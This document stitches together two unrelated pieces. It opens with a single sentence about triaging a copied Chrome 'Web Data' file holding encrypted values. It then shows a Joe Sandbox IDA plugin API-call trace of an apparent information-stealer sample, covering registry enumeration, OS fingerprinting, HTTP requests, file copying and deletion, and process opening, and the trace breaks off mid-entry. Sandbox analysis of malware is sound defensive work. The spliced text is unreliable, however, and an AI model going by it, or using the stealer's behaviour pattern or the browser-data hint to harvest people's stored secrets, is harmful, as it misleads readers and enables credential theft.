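Point `build_sample_webdata` at a copy of a real `Web Data` file (Chrome locks the live one; copy it first) and drop the `CREATE TABLE`/`INSERT` lines to triage an actual profile; the `ValueError` path catches values that carry a known prefix but are too short to contain a nonce and tag, which is worth surfacing rather than silently skipping when the database was partially overwritten.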
                                                        APIs
                                                          • Part of subcall function 00B27537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
                                                          • Part of subcall function 00B27537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                          • Part of subcall function 00B27537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                          • Part of subcall function 00B27537: GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                          • Part of subcall function 00B27537: HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                        • lstrcat.KERNEL32(0064A668,004217FC), ref: 00B2786D
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278AF
                                                        • lstrcat.KERNEL32(0064A668,00421800), ref: 00B278C1
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B278F6
                                                        • lstrcat.KERNEL32(0064A668,00421804), ref: 00B27907
                                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 00B2793A
                                                        • lstrcat.KERNEL32(0064A668,00421808), ref: 00B27954
                                                        • task.LIBCPMTD ref: 00B27962
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                        • String ID:
                                                        • API String ID: 2677904052-0
                                                        • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction ID: bedc729543feb421c78f6188188ff6421edba6a30d58b1973172d7455a244abf
                                                        • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                        • Instruction Fuzzy Hash: 41315E79A40119EFDB04FBE0EC95DFE77BAEB55301F205058F10A672A0DE34A942CB65
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                        • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                        • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                        • InternetCloseHandle.WININET(?), ref: 004050C6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 3894370878-0
                                                        • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                        • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                        • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B25231
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B25238
                                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00B25251
                                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B25278
                                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B252A8
                                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 00B252F1
                                                        • InternetCloseHandle.WININET(?), ref: 00B25320
                                                        • InternetCloseHandle.WININET(?), ref: 00B2532D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                        • String ID:
                                                        • API String ID: 1008454911-0
                                                        • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction ID: 7407285280472b4cc9e15fee30f3df434af0ed6486e51c9d9ba6125508fbde8d
                                                        • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                        • Instruction Fuzzy Hash: 1431F8B8A40228EBDB20CF94DC85BDCB7B5EB48704F5081D9F609A7281D7746EC58F99
                                                        APIs
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 00B358AB
                                                        • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00B35908
                                                        • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00B35ABE
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B35457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 00B3548F
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B35527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35596
                                                          • Part of subcall function 00B35527: StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                          • Part of subcall function 00B35527: strtok.MSVCRT(00000000,?), ref: 00B35605
                                                          • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35615
                                                        • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 00B359F2
                                                        • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00B35BA7
                                                        • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00B35C73
                                                        • Sleep.KERNEL32(0000EA60), ref: 00B35C82
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID:
                                                        • API String ID: 3630751533-0
                                                        • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction ID: 0b075c65eb3a11c38c68679c85202f9917a4fe8ac32e83bc35c3743da5d5b434
                                                        • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                        • Instruction Fuzzy Hash: 76E15772900204ABCB18FBB0DD96DED73B9AF66701F7085ACB44666191EF346F48CB52
                                                        APIs
                                                        • memset.MSVCRT ref: 00B2158E
                                                          • Part of subcall function 00B21507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                          • Part of subcall function 00B21507: RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                          • Part of subcall function 00B21507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                          • Part of subcall function 00B21507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                          • Part of subcall function 00B21507: RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B215B6
                                                        • lstrlen.KERNEL32(?), ref: 00B215C3
                                                        • lstrcat.KERNEL32(?,004262EC), ref: 00B215DE
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B216CC
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                          • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                          • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                          • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                          • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                          • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B21756
                                                        • memset.MSVCRT ref: 00B2177D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                        • String ID:
                                                        • API String ID: 3885987321-0
                                                        • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction ID: 1fd90f10a2ae4b3b424127d46309a48dafbef2f9e0c9558077e97aebc3f82c7a
                                                        • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                        • Instruction Fuzzy Hash: 685151B2940218ABCB15FB60DD92EED73BCEF55700F6041E8B64A62091EE305B89CF56
                                                        APIs
                                                        • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,008267A8,?,0042110C,?,00000000,?), ref: 0041696C
                                                        • sscanf.NTDLL ref: 00416999
                                                        • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,008267A8,?,0042110C), ref: 004169B2
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008267A8,?,0042110C), ref: 004169C0
                                                        • ExitProcess.KERNEL32 ref: 004169DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID: B
                                                        • API String ID: 2533653975-2248957098
                                                        • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                        • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                        • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                        APIs
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829BA0,00000000,000F003F,?,00000400), ref: 004184EC
                                                        • lstrlenA.KERNEL32(?), ref: 00418501
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829D80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                        • String ID: %s\%s
                                                        • API String ID: 3896182533-4073750446
                                                        • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                        • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                        • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction ID: 5187fc8eaa553716601274e31fa58b587f700f9cb71d89d3c72375ae472e6b16
                                                        • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                        • Instruction Fuzzy Hash: AD215BB5D00219ABDF10EFA4E849AED7BB4FF05321F108225F965A72D0EB706A05CF91
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                        • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                        • RegOpenKeyExA.ADVAPI32(80000002,008245C8,00000000,00020119,00000000), ref: 004176DD
                                                        • RegQueryValueExA.ADVAPI32(00000000,00829B88,00000000,00000000,?,000000FF), ref: 004176FE
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3466090806-2517555085
                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3790B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37912
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B37944
                                                        • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B37965
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B3796F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID: Windows 11
                                                        • API String ID: 3225020163-2517555085
                                                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction ID: 4c24ff272e2303af86a5c3289b201837adc38b684d17126928c3ed912d1c0aa9
                                                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                        • Instruction Fuzzy Hash: 2F012CBDA84208BBEB10DBE0DD49FADB7B9EB48701F105294FA05A6281DA7499008B51
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                        • RegOpenKeyExA.ADVAPI32(80000002,008245C8,00000000,00020119,004176B9), ref: 0041775B
                                                        • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                        • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID: CurrentBuildNumber
                                                        • API String ID: 3466090806-1022791448
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                        APIs
                                                        • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                        • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                        • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID: :A$:A
                                                        • API String ID: 1378416451-1974578005
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
                                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                        • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                        • HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                          • Part of subcall function 00B294A7: vsprintf_s.MSVCRT ref: 00B294C2
                                                        • task.LIBCPMTD ref: 00B277BC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                        • String ID:
                                                        • API String ID: 700816787-0
                                                        • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction ID: c239a29516c48e6a5a7e722e29fb695a110170696b88fb0cc96802c9b4aa1055
                                                        • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                        • Instruction Fuzzy Hash: 526106B59442689BDB24DB50DC95FE9B7B8BF48300F0081E9E649A6241DFB06AC5CF94
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B264E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                          • Part of subcall function 00B264E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                          • Part of subcall function 00B264E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                          • Part of subcall function 00B264E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                          • Part of subcall function 00B264E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                          • Part of subcall function 00B264E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                        • lstrlen.KERNEL32(00000000), ref: 00B35596
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                        • lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                        • strtok.MSVCRT(00000000,?), ref: 00B35605
                                                        • lstrlen.KERNEL32(00000000), ref: 00B35615
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID:
                                                        • API String ID: 3532888709-0
                                                        • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction ID: 3893341b45124a69be38c8d97f904a8a1e8707fbb4da29029964e0462dd9d372
                                                        • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                        • Instruction Fuzzy Hash: F0512C71510208EBCB18FF64DE92EED77B5AF21701FB04198F44A665A1DB346B05CB52
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B37345
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00B37574,004205BD), ref: 00B37383
                                                        • memset.MSVCRT ref: 00B373D1
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B37525
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
